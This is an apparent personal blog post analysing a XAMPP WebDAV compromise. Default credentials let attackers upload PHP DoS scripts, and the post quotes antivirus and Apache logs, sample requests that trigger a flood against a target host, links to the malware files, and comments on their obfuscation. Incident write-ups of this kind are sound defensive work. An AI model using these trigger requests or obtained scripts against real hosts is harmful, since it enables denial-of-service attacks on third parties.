XAMPP WebDAV Vulnerability

This vulnerability basically WebDav can be access like ftp server if you know the username & Password. since Xampp places the default username & password the user doesn't restrict the access to xampp directory after the xampp installtion attackers can places their files & execute remotely. they can use your PC to DDoS their targets.


Quite a strange my machine generating 80Mbps traffic towards one of the host.
as usual i searched through process explore (sysinternal ) for any unwanted process + tcp connection, Nothing suspicious.But Anti-Virus logs points out http.exe trying to access IRC ports http.exe is xammp apache server process. 

1/21/2011 10:02:23 AM Blocked by port blocking rule  X:\xampplite\apache\bin\httpd.exe Anti-virus Standard Protection:Prevent IRC communication 173.192.66.130:6666
1/21/2011 10:35:45 AM Blocked by port blocking rule  X:\xampplite\apache\bin\httpd.exe Anti-virus Standard Protection:Prevent IRC communication 199.27.134.100:6668
1/21/2011 10:37:04 AM Blocked by port blocking rule  X:\xampplite\apache\bin\httpd.exe Anti-virus Standard Protection:Prevent IRC communication 199.27.134.100:6666
1/21/2011 10:39:36 AM Blocked by port blocking rule  X:\xampplite\apache\bin\httpd.exe Anti-virus Standard Protection:Prevent IRC communication 74.53.201.162:6668

so i was suspicious over the xampp and started to google around vulnerability for Xampp and found xampp webdav has default password , anybody can access it and place files in the folder it. through that they can access whole server content.
Next step the apache logs ,
Access log points that too ( watch the PUT) : 


50.22.21.218 - - [18/Jan/2011:14:02:34 +0530] "GET /webdav/ HTTP/1.1" 200 313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
50.22.21.218 - - [18/Jan/2011:14:02:34 +0530] "PROPFIND /webdav/ HTTP/1.1" 401 1369 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:34 +0530] "PROPFIND /webdav/ HTTP/1.1" 207 2397 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:35 +0530] "PROPFIND /webdav/ HTTP/1.1" 207 2397 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:35 +0530] "PUT /webdav/info.php HTTP/1.1" 201 332 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:36 +0530] "PROPFIND /webdav/ HTTP/1.1" 207 3174 "-" "WEBDAV Client"
50.22.21.218 - - [18/Jan/2011:14:02:41 +0530] "GET /webdav/info.php HTTP/1.1" 200 105 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
50.22.21.218 - wampp [18/Jan/2011:14:02:49 +0530] "DELETE /webdav/info.php HTTP/1.1" 204 - "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:49 +0530] "PUT /webdav/x32.php HTTP/1.1" 201 331 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:50 +0530] "PROPFIND /webdav/ HTTP/1.1" 207 3174 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:50 +0530] "PUT /webdav/servconfig.php HTTP/1.1" 201 338 "-" "WEBDAV Client"
50.22.21.218 - wampp [18/Jan/2011:14:02:52 +0530] "PROPFIND /webdav/ HTTP/1.1" 207 3958 "-" "WEBDAV Client"

3 files placed by the attackers leaf.php,servconfig.php, x32.php ( no idea what is leaf.php anybody have any idea ? here i've attached the php files. : 

01/22/2011  03:03 AM             1,107 leaf.php
01/21/2011  08:56 PM             3,775 servconfig.php
12/20/2009  12:00 AM               277 webdav.txt
01/18/2011  02:02 PM             1,975 x32.php

rar file .
http://hotfile.com/dl/100076218/c618307/webdav.rar.html

x32.php gives basic interface where you can place host & time duration for the attack. Sample attack request : This may be vary depend on the php /active content the attacker places. 

"91.121.2.103 - - [27/Jan/2011:15:09:14 +0530] "GET /webdav/x32.php?act=phptools&host=76.105.134.136&time=120&port=3074 HTTP/1.1" 200 1133 "-" "-"
91.121.2.103 - - [27/Jan/2011:15:10:14 +0530] "GET /webdav/x32.php?act=phptools&host=76.105.134.136&time=120&port=3074 HTTP/1.1" 200 1134 "-" "-"
91.121.2.103 - - [27/Jan/2011:15:10:51 +0530] "GET /webdav/x32.php?act=phptools&host=76.105.134.136&time=120&port=3074 HTTP/1.1" 200 1133 "-" "-"
91.121.2.103 - - [27/Jan/2011:15:13:48 +0530] "GET /webdav/x32.php?act=phptools&host=76.105.134.136&time=120&port=3074 HTTP/1.1" 200 1134 "-" "-" 
"

workaround:
Change the default username and password on the webdav folder that placed by the xampp
X:/xampp/security/webdav.htpasswd

Delete the webdev folder / search google XAMPP WebDAV vulnerability.

Comments

Ben Poulson said…
I just found your blog, and I've subscribed!

I had a look at your leaf.php question, and here's the source from it.

http://pastebin.com/qXhsKj26

It's a heavily encrypted DoS script.
February 14, 2011 at 4:30 AM
Emmanuel Arul Gobinath said…
Thanks Ben, now only i checked the functions placed around the string :) .
gzinflate , str_rot13 ,base64_decode
so basically they have compressed , rot13 encryption , base64 encoding .
February 14, 2011 at 8:32 AM
Ben Poulson said…
Yes, they had encrypted it using those 3 methods.

But repeatedly, if you looked inside, you'd see more functions compressing yet more information, untill eventually you'll hit the code I pasted above!
February 15, 2011 at 12:49 AM
Anonymous said…
Stealthbooter.com
is the culprit. They have been hacking servers and using them to DDoS. They also rent out "access" to their server so anybody can DDoS.
May 7, 2011 at 10:39 PM
Post a Comment

Popular posts from this blog

PPTP Server as Cisco for Mikrotik Client

Image
Following configuration explains the Cisco as PPTP server and connecting two sites: Following Configuration needed to enable the VPDN and default server: vpdn enable ! vpdn-group Mtik ! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 1 interface Virtual-Template1 ip unnumbered Loopback0 peer default ip address pool IPPOOL1 ppp encrypt mppe auto required ppp authentication ms-chap-v2 ms-chap pap ip local pool IPPOOL1 192.168.150.10 192.168.150.224 Few more additional things we need to keep the same ip address for the user: aaa new-model ! ! aaa authentication ppp default local aaa authorization network default local ! aaa attribute list Gobi attribute type addr 192.168.150.13 service ppp protocol ip mandatory attribute type route "10.0.0.0 255.255.255.0 192.168.150.13" attribute type interface-config "description Gobi-test" Finally apply the attribute list to the user: username gobi password 0 test username gobi aaa attri...
Read more

l2tpv3 configuration reference

Image
Reference Comparing , Designing and Deploying VPNs chap - 02 : L2TPv3 is the enhanced version of L2TPv2 protocol. Mikrotik uses L2TPv2 i suppose but it offer another similar tunneling mechanism as EOIP. L2TPv3 in cisco provides Pseudo-wire services to the customer. L2TPv3 only require the IP connectivity between peers but it can transport Ethernet, 802.1Q , HDLC, PPP framerelay etc. Advantage over MPLS is the customer having the full control of their routing domain. L2TP depolyment methods having 3 topologies LAC - LNS , LNS - LNS , LAC - LAC Following Diagram explain simple LAC - LAC L2TPv3 setup. It uses two types of messages: control connection messages - used for signaling between LCEs session data messages - Used to transport layer 2 protocols and connections Data channel Message Header having Session ID & cookie to correctly associate with the tunnel Deploying dynamic Pseudowires session 1) configure CEF - Its default in IOSs now. 2) configure a loopback in...
Read more

proxy arp

Image
In the above diagram , both hosts don't have default routes. But both are in the same /16 subnet. When host1 tries to ping host2 will it be able to ping ? Yes this behaviour due to the Proxy Arp feature. Note: Cisco by default enabled the proxy arp feature you have to disable it manually . Check the following Debug messages "debug arp" from the router. When the Arp request for 192.168.20.101 received on the router Fa0/1 it replies with its own mac address of fa0/1. (c200.03fc.0001)and vice versa *Mar 1 00:11:43.071: IP ARP: rcvd req src 192.168.12.154 00aa.00f4.6800, dst 192.168.20.101 FastEthernet0/1 *Mar 1 00:11:43.075: IP ARP: sent rep src 192.168.20.101 c200.03fc.0001,dst 192.168.12.154 00aa.00f4.6800 FastEthernet0/1 *Mar 1 00:13:13.067: IP ARP: rcvd req src 192.168.20.101 00aa.0041.1d00, dst 192.168.12.154 FastEthernet0/0 *Mar 1 00:13:13.067: IP ARP: sent rep src 192.168.12.154 c200.03fc.0000, dst 192.168.20.101 00aa.0041.1d00 FastEther...
Read more